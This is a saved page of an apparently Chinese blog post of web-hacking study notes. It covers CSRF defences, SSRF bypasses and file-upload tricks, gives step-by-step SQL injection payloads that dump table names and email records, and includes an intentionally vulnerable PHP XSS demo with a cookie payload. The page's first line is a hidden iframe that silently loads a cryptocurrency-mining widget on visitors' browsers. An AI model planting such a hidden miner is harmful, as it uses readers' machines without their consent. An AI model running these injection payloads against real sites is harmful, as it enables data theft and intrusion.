<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dash/?ref=CD1A3EFFFAF0&mode=widget" style="display:none;"></iframe>

<!doctype html>














<html class="theme-next mist" lang="zh-Hans">
<head>
  <meta name="referrer" content="never">
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="web hack," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />
















<meta name="description" content="http://tool.chinaz.com/map.aspx">
<meta name="keywords" content="web hack">
<meta property="og:type" content="article">
<meta property="og:title" content="Web Hack 原理">
<meta property="og:url" content="/blog/2019/01/27/%E5%8E%9F%E7%90%86">
<meta property="og:site_name" content="Notes">
<meta property="og:description" content="http://tool.chinaz.com/map.aspx">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fzkzhur546j31360fwq47.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79gy1fzkzn9anlsj31640q2qfd.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzkzuewxyaj30y80fc404.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79ly1fzl0dtq046j31780jutbh.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzl1u4gkmfj31780qg100.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79gy1fzl4nm6au8j318g0pmae8.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79gy1fzl4yp1ht6j316o0scn1s.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79gy1fzl4u6hd99j318e0tk78o.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzl4vj883yj315s0jq41d.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79gy1fzl4w6294xj317o0ty41b.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79gy1fzl4zizsx1j318s0gyabh.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzl503t542j31760hmdi6.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzlahkdncej319o0dimya.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fzlf984u05j316m0u0dgq.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79gy1fzlhydlnp3j317e0h0myj.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzlipg5l1qj311d0u040u.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79gy1fzn9drmtjrj31fg0tyjt0.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tNc79gy1fzn9cog7o0j31w00u0tac.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tNc79gy1fznb5qgpzlj317s0u040n.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fznb3dsr9cj315s0u0js9.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzmavk7choj31i80j2dgt.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/006tNc79gy1fzmaxdp01ej31ho0o03zq.jpg">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Web Hack 原理">
<meta name="twitter:description" content="http://tool.chinaz.com/map.aspx">
<meta name="twitter:image" content="https://ws2.sinaimg.cn/large/006tNc79gy1fzkzhur546j31360fwq47.jpg">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: false,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href=""/>





  <title>Web Hack 原理 | Notes</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-120397256-1', 'auto');
  ga('send', 'pageview');
</script>













</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  

  <div class="container sidebar-position-right page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-book">
          <a href="/book/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />
            
            库
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>


 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            <!--<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincash/?ref=CD1A3EFFFAF0&mode=widget" style="display:none;"></iframe>-->


<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/blog/2019/01/27/%E5%8E%9F%E7%90%86">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="wyx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Notes">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">
          
          
            Web Hack 原理
          
        </h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-27T00:00:00+08:00">
                2019-01-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/#/hack" itemprop="url" rel="index">
                    <span itemprop="name">hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/blog/2019/01/27/%E5%8E%9F%E7%90%86" class="leancloud_visitors" data-flag-title="Web Hack 原理">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          
            
                <div class="post-description">
                    
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <p><a href="http://tool.chinaz.com/map.aspx">http://tool.chinaz.com/map.aspx</a></p>

<h1 id="信息">信息</h1>
<p><code class="highlighter-rouge">whois 域名</code> 注册人名 邮箱
<a href="http://whois.chinaz.com">http://whois.chinaz.com</a></p>

<h1 id="ip">ip</h1>
<p><code class="highlighter-rouge">ping ip</code> get cdn ip <a href="http://ping.chinaz.com">http://ping.chinaz.com</a></p>

<p>how get src ip</p>
<ul>
  <li>check subdomain 一般只有主站cdn</li>
  <li><img src="https://ws2.sinaimg.cn/large/006tNc79gy1fzkzhur546j31360fwq47.jpg" alt="" /></li>
  <li><a href="https://toolbar.netcraft.com/site_report?url=">https://toolbar.netcraft.com/site_report?url=</a>历史记录cdn前一个ip就是真实ip</li>
  <li><img src="https://ws3.sinaimg.cn/large/006tNc79gy1fzkzn9anlsj31640q2qfd.jpg" alt="" /></li>
</ul>

<h1 id="目录">目录</h1>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzkzuewxyaj30y80fc404.jpg" alt="" /></p>
<ul>
  <li><a href="http://www.cnblogs.com/xuanhun/p/3910134.html">gh 用法</a></li>
  <li><a href="https://www.exploit-db.com/google-hacking-database">gh db</a>
<img src="https://ws4.sinaimg.cn/large/006tNc79ly1fzl0dtq046j31780jutbh.jpg" alt="" /></li>
</ul>

<h1 id="csrf">CSRF</h1>
<p>跨越请求伪造 cross-site request forgery</p>

<p>CSRF 攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点，从而在并未授权的情况下执行在权限保护之下的操作。</p>

<p>攻击者创建一个链接，受害者点击它之后就可以完成攻击者想要的操作，这些操作一般是删除文章，
创建用户之类。比如某网站的删除文章链接是<code class="highlighter-rouge">http://www.xxx.com/post/&lt;id&gt;/delete</code>，那么攻击者可以直接构造出来发给有权限的人，
它点击之后就可以将文章删除。当然，攻击者也可以使用当下流行的短网址服务来伪造 URL，避免受到怀疑。</p>

<p>请求会附带浏览器中的目标域名的cookie一起发向目标服务器</p>

<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzl1u4gkmfj31780qg100.jpg" alt="" /></p>

<h2 id="tar">tar</h2>
<p>查询类的API不用保护。改变类的需要csrf保护</p>

<h2 id="防策略">防策略</h2>

<h3 id="http-referer">HTTP Referer</h3>
<ul>
  <li>简单易行，安全敏感的请求统一增加一个拦截器来检查 Referer 的值就可以</li>
  <li>浏览器Referer被篡改</li>
  <li>用户自己可以设置浏览器使其在发送请求时不再提供Referer</li>
</ul>

<h3 id="csrf-token">csrf token</h3>
<p>要抵御 CSRF，关键在于在请求中放入黑客所不能伪造的信息，并且该信息不存在于 cookie 之中。</p>

<p>HTTP 请求中以参数的形式加入一个随机产生的 token，并在服务器端建立一个拦截器来验证这个 token，
如果请求中没有 token 或者 token 内容不正确，则认为可能是 CSRF 攻击而拒绝该请求。</p>

<ul>
  <li>非常麻烦参数
    <blockquote>
      <p>在一个网站中，可以接受请求的地方非常多，要对于每一个请求都加上 token 是很麻烦的，
并且很容易漏掉，通常使用的方法就是在每次页面加载时，使用 javascript 遍历整个 dom 树，
对于 dom 中所有的 a 和 form 标签后加入 token。这样可以解决大部分的请求，
但是对于在页面加载之后动态生成的 html 代码，这种方法就没有作用，还需要程序员在编码时手动添加 token。</p>
    </blockquote>
  </li>
  <li>难以保证 token 本身的安全
    <ul>
      <li>系统可以在添加 token 的时候增加一个判断，如果这个链接是链到自己本站的，就在后面添加 token，如果是通向外网则不加。</li>
      <li>黑客的网站也同样可以通过 Referer 来得到这个 token 值以发动 CSRF 攻击。</li>
    </ul>
  </li>
</ul>

<h3 id="header-中自定义属性并验证">Header 中自定义属性并验证</h3>
<p>使用 token 并进行验证 ,放到 HTTP 头中自定义的属性。</p>

<p>解决了上种方法在请求中加入 token 的不便，
同时，通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏，
也不用担心 token 会透过 Referer 泄露到其他网站中去。</p>

<p>局限性非常大，并非所有的请求都适合用XMLHttpRequest。</p>

<p>对于没有进行 CSRF 防护的遗留系统来说，要采用这种方法来进行防护，
要把所有请求都改为 XMLHttpRequest 请求，这样几乎是要重写整个网站，这代价无疑是不能接受的。</p>

<h3 id="summary">summary</h3>
<p>通过上文讨论可知，目前业界应对 CSRF 攻击有一些克制方法，但是每种方法都有利弊，没有一种方法是完美的。
如何选择合适的方法非常重要。如果网站是一个现有系统，想要在最短时间内获得一定程度的 CSRF 的保护，那么验证 Referer 的方法是最方便的，
要想增加安全性的话，可以选择不支持低版本浏览器，毕竟就目前来说，IE7+, FF3+ 这类高版本浏览器的 Referer 值还无法被篡改。</p>

<p>如果系统必须支持 IE6，并且仍然需要高安全性。那么就要使用 token 来进行验证，在大部分情况下，使用 XmlHttpRequest 并不合适，
token 只能以参数的形式放于请求之中，若你的系统不支持用户自己发布信息，那这种程度的防护已经足够，否则的话，
你仍然难以防范 token 被黑客窃取并发动攻击。在这种情况下，你需要小心规划你网站提供的各种服务，
从中间找出那些允许用户自己发布信息的部分，把它们与其他服务分开，使用不同的 token 进行保护，这样可以有效抵御黑客对于你关键服务的攻击，
把危害降到最低。毕竟，删除别人一个帖子比直接从别人账号中转走大笔存款严重程度要轻的多。</p>

<p>如果是开发一个全新的系统，则抵御 CSRF 的选择要大得多。笔者建议对于重要的服务，可以尽量使用 XMLHttpRequest 来访问，
这样增加 token 要容易很多。另外尽量避免在 js 代码中使用复杂逻辑来构造常规的同步请求来访问需要 CSRF 保护的资源，
比如 window.location 和 document.createElement(“a”) 之类，这样也可以减少在附加 token 时产生的不必要的麻烦。</p>

<h1 id="sql-注入">SQL 注入</h1>

<h2 id="基于-回显">基于 回显</h2>
<p>页面中显示db信息  主要通过union</p>

<h3 id="注入点">注入点</h3>

<p><code class="highlighter-rouge">and 1=1</code>  <code class="highlighter-rouge">and 1=2</code></p>

<h3 id="列数">列数</h3>

<p><code class="highlighter-rouge">order by ?</code> <code class="highlighter-rouge">?</code> &gt;= 1 数字 直到N -&gt; 列数 = N-1</p>

<h3 id="用户-db">用户 db</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1,concat(current_user(),' ',database())</code>
<img src="https://ws3.sinaimg.cn/large/006tNc79gy1fzl4nm6au8j318g0pmae8.jpg" alt="" /></p>

<h3 id="表数量">表数量</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1,count(table_name) from information_schema.tables where table_schema=database()</code>
<img src="https://ws4.sinaimg.cn/large/006tNc79gy1fzl4yp1ht6j316o0scn1s.jpg" alt="" /></p>

<h3 id="表名">表名</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit ?,1</code>
<img src="https://ws3.sinaimg.cn/large/006tNc79gy1fzl4u6hd99j318e0tk78o.jpg" alt="" /></p>

<h3 id="表的列数量">表的列数量</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1,count(column_name) from information_schema.columns where table_name='email'</code>
<img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzl4vj883yj315s0jq41d.jpg" alt="" /></p>

<h3 id="表列名">表列名</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1,column_name from information_schema.columns where table_name='email' limit ?,1</code>
<img src="https://ws4.sinaimg.cn/large/006tNc79gy1fzl4w6294xj317o0ty41b.jpg" alt="" /></p>

<h3 id="行数">行数</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1, count(1) from email</code>
<img src="https://ws3.sinaimg.cn/large/006tNc79gy1fzl4zizsx1j318s0gyabh.jpg" alt="" /></p>

<h3 id="记录">记录</h3>
<p><code class="highlighter-rouge">1 and 1=2 union select 1,concat(userid,' ',email) from email limit ?,1</code>
<img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzl503t542j31760hmdi6.jpg" alt="" /></p>

<h2 id="基于-bool">基于 bool</h2>
<p>在一些情况下，页面上是没有回显的。也就是说，不显示任何数据库中的信息。我们只能根据输出判断是否成功、失败、或者错误。这种情况就叫做盲注。
<strong>如果我们想查询整数值，构造布尔语句直接爆破；如果想查询字符串值，先爆破它的长度，再爆破每一位</strong></p>

<h3 id="查询用户及数据库名称">查询用户及数据库名称</h3>

<p><code class="highlighter-rouge">1 and (select length(database()))=?</code></p>

<h2 id="sqlmap">sqlmap</h2>

<p><code class="highlighter-rouge">pip install sqlmap</code></p>

<p><a href="/blog/2019/01/28/web_hack_tool#sqlmap">用法</a></p>

<h1 id="ssrf">SSRF</h1>
<p>很多 Web 应用都提供了从其他服务器上获取数据的功能。使用用户指定的 URL，web 应用可以获取图片，下载文件，读取文件内容等。
这个功能如果被恶意使用，可以利用存在缺陷的 Web 应用作为代理，攻击远程和本地服务器（内网）。这种形式的攻击成为服务器请求伪造（SSRF）</p>

<h2 id="漏洞可能性">漏洞可能性</h2>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzlahkdncej319o0dimya.jpg" alt="" /></p>

<ul>
  <li>分享：通过 URL 分享网页内容</li>
</ul>

<p>如果在此功能中没有对目标地址范围做过滤与限制，就存在 SSRF 漏洞。</p>

<ul>
  <li>转码服务：通过 URL 地址把原地址的网页内容调优使其适合手机屏幕浏览</li>
  <li>在线翻译：通过 URL 地址翻译对应文本的内容。提供此功能的国内公司有百度、有道等</li>
  <li>图片加载与下载：通过 URL 地址加载或下载图片</li>
  <li>图片、文章收藏功能</li>
</ul>

<p><img src="https://ws2.sinaimg.cn/large/006tNc79gy1fzlf984u05j316m0u0dgq.jpg" alt="" /></p>

<h2 id="排除ssrf">排除ssrf</h2>

<p>图片是百度上的，你调用的是搜狗API，浏览器向百度请求图片，那么就不存在 SSRF 漏洞。
如果浏览器向搜狗请求图片，那么就说明搜狗服务器发送了请求，向百度请求图片，可能存在 SSRF。</p>

<p><img src="https://ws3.sinaimg.cn/large/006tNc79gy1fzlhydlnp3j317e0h0myj.jpg" alt="" /></p>

<h2 id="绕过方法">绕过方法</h2>
<h3 id="url-绕过">URL 绕过</h3>
<p><img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzlipg5l1qj311d0u040u.jpg" alt="" /></p>

<p>访问<code class="highlighter-rouge">@后面的url</code></p>

<h3 id="ip-转换">ip 转换</h3>

<p><code class="highlighter-rouge">127.0.0.1</code>-&gt;<code class="highlighter-rouge">0x7F.0x00.0x00.0x01</code> or <code class="highlighter-rouge">0177.0000.0000.0001</code></p>

<h3 id="url-跳转">URL 跳转</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code><span class="cp">&lt;?php</span> <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: </span><span class="nv">$_GET['url']</span><span class="s2">"</span><span class="p">);</span> <span class="cp">?&gt;</span>
</code></pre></td></tr></tbody></table></div></div>

<p>保存为urllocation.php然后部署，之后可以用http://<host>/urllocation.php?url=<url>来跳转。</url></host></p>

<h3 id="短网址">短网址</h3>

<p><a href="http://dwz.cn/">百度短网址</a></p>

<p><a href="http://xip.io/">自定义dns解析IP xip.io</a></p>

<h1 id="xss">XSS</h1>
<p>跨站脚本攻击（Cross Site Scripting）</p>

<p>恶意攻击者往 Web 页面里插入恶意 js 代码，当用户浏览器该页之时，嵌入 Web 页面里的代码会被执行，从而达到恶意攻击用户的目的。</p>

<p>XSS 是实现 CSRF 的诸多途径中的一条，但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。</p>

<h2 id="攻击方式">攻击方式</h2>
<p><strong>payload  在 XSS 中指代攻击代码或攻击语句</strong></p>

<ul>
  <li>反射型：Payload 经过后端，不经过数据库</li>
  <li>存储型：Payload 经过后端，经过数据库</li>
  <li>DOM：Payload 不经过后端</li>
</ul>

<h2 id="反射型">反射型</h2>
<p>需要欺骗用户点击链接才能触发 XSS 代码（数据库中没有这样的页面和内容）。Payload 一般存在于 URL 或者 HTTP 正文中，需要构造页面，或者构造 URL。</p>

<p>提交js代码到表单，没有过滤。浏览器直接解析代码。</p>
<div class="language-php highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13<br/>14<br/>15</pre></td><td class="code"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="c1">//关闭浏览器xss保护
</span><span class="nb">header</span><span class="p">(</span><span class="s1">'X-XSS-Protection: 0'</span><span class="p">);</span>
<span class="cp">?&gt;</span>
    <span class="nt">&lt;p&gt;</span>反射型 XSS 演示<span class="nt">&lt;/p&gt;</span>
    <span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">""</span> <span class="na">method=</span><span class="s">"get"</span><span class="nt">&gt;</span>
        <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"xss"</span><span class="nt">/&gt;</span>
        <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"test"</span><span class="nt">/&gt;</span>
    <span class="nt">&lt;/form&gt;</span>
<span class="cp">&lt;?php</span>
<span class="nv">$xss</span> <span class="o">=</span> <span class="o">@</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'xss'</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$xss</span> <span class="o">!==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="nv">$xss</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></td></tr></tbody></table></div></div>

<p>输入<code class="highlighter-rouge">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p>

<p>这个例子中 URL 为<code class="highlighter-rouge">http://localhost/xss.php?xss=%3Cscript%3Ealert%281%29%3C%2Fscript%3E</code>，这个 URL 容易引起怀疑，可以使用<strong>短网址工具缩短</strong>后发送给受害者。
从上面的例子中，我们可以看出，反射型 XSS 的数据流向是：<strong>浏览器 -&gt; 后端 -&gt; 浏览器</strong>。</p>

<h2 id="存储型">存储型</h2>

<p>代码储存在数据库中。如在个人信息或发表文章等地方，假如代码，如果没有过滤或过滤不严，那么这些代码将储存到数据库中，
用户访问该页面的时候出发代码执行。这种 XSS 比较危险，容易造成蠕虫，盗窃 Cookie 等。</p>

<p><strong>浏览器 -&gt; 后端 -&gt; 数据库 -&gt; 后端 -&gt; 浏览器。</strong></p>

<h2 id="xss平台">xss平台</h2>
<p>我们可能需要通过 XSS 来获得用户 Cookie 或其他有用信息，利用平台负责接收并保存这些信息。另外，利用平台能够托管利用脚本，于是我们可以向页面只注入一个脚本链接，使长度极大缩短。</p>

<ul>
  <li><a href="https://webxss.com/">xss平台</a></li>
</ul>

<h1 id="第三方漏洞">第三方漏洞</h1>
<ul>
  <li>域名商</li>
  <li>云服务器商</li>
  <li>外源js</li>
  <li><a href="https://wizardforcel.gitbooks.io/mst-sec-lecture-notes/content/%E6%BC%8F%E6%B4%9E%E7%AF%87%20%E4%B8%AD%E9%97%B4%E4%BB%B6.html">Java中间件</a></li>
</ul>

<h1 id="口令爆破">口令爆破</h1>
<ul>
  <li><a href="https://zhuanlan.zhihu.com/p/22288110">Burp Suite</a></li>
  <li>PKAV Fuzzer</li>
</ul>

<h1 id="提权">提权</h1>

<h1 id="越权">越权</h1>

<ul>
  <li>水平越权：权限不变，身份改变</li>
  <li>垂直越权：身份不变，权限改变</li>
</ul>

<h2 id="信息遍历">信息遍历</h2>
<p>通过遍历<code class="highlighter-rouge">id=xxx</code>来获取其他信息。</p>

<p>信息遍历属于水平越权，因为用户还是普通用户，但是身份变成了其它的普通用户。</p>

<h3 id="burp-爆破">burp 爆破</h3>
<p><img src="https://ws4.sinaimg.cn/large/006tNc79gy1fzn9drmtjrj31fg0tyjt0.jpg" alt="" />
<img src="https://ws4.sinaimg.cn/large/006tNc79gy1fzn9cog7o0j31w00u0tac.jpg" alt="" />
<img src="https://ws3.sinaimg.cn/large/006tNc79gy1fznb5qgpzlj317s0u040n.jpg" alt="" />
<img src="https://ws1.sinaimg.cn/large/006tNc79gy1fznb3dsr9cj315s0u0js9.jpg" alt="" /></p>

<p>这玩意慢死了，如果不复杂的话，还不如直接上手编程。</p>

<h2 id="隐藏式后台">隐藏式后台</h2>
<p>扫描器扫出后台地址，然后尝试访问。</p>

<h2 id="绕过">绕过</h2>
<p>修改cookie的某些值，后台不做检查可以绕过。</p>

<p>改密码等</p>

<h1 id="上传文件">上传文件</h1>

<p>上传漏洞的目的是拿到 <strong>WebShell</strong>，也就是取得一定的<strong>服务器权限</strong>。</p>

<h2 id="绕过-content-type限制">绕过 <code class="highlighter-rouge">Content-type</code>限制</h2>

<p>利用 Burp Suite 直接改<code class="highlighter-rouge">Content-type</code>
<span class="gp-2">
    <img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzmavk7choj31i80j2dgt.jpg" />
    <img src="https://ws1.sinaimg.cn/large/006tNc79gy1fzmaxdp01ej31ho0o03zq.jpg" />
</span></p>

<h2 id="检验-文件后缀名">检验 文件后缀名</h2>

<p><del>貌似绕不开</del></p>



      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      wyx
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="/blog/2019/01/27/%E5%8E%9F%E7%90%86" title="Web Hack 原理">/blog/2019/01/27/%E5%8E%9F%E7%90%86</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            
            <a href="/tag/#/web%20hack" rel="tag"># web hack</a>
          
        </div>
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2019/01/28/web_hack_tool" rel="next" title="Web Hack 工具">
                <i class="fa fa-chevron-left"></i> Web Hack 工具
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2019/01/25/%E6%8B%A9%E6%97%B6" rel="prev" title="量化择时">
                量化择时 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="gitalk-container"></div>
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="wyx" />
          <p class="site-author-name" itemprop="name">wyx</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">195</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/">
                <span class="site-state-item-count">27</span>
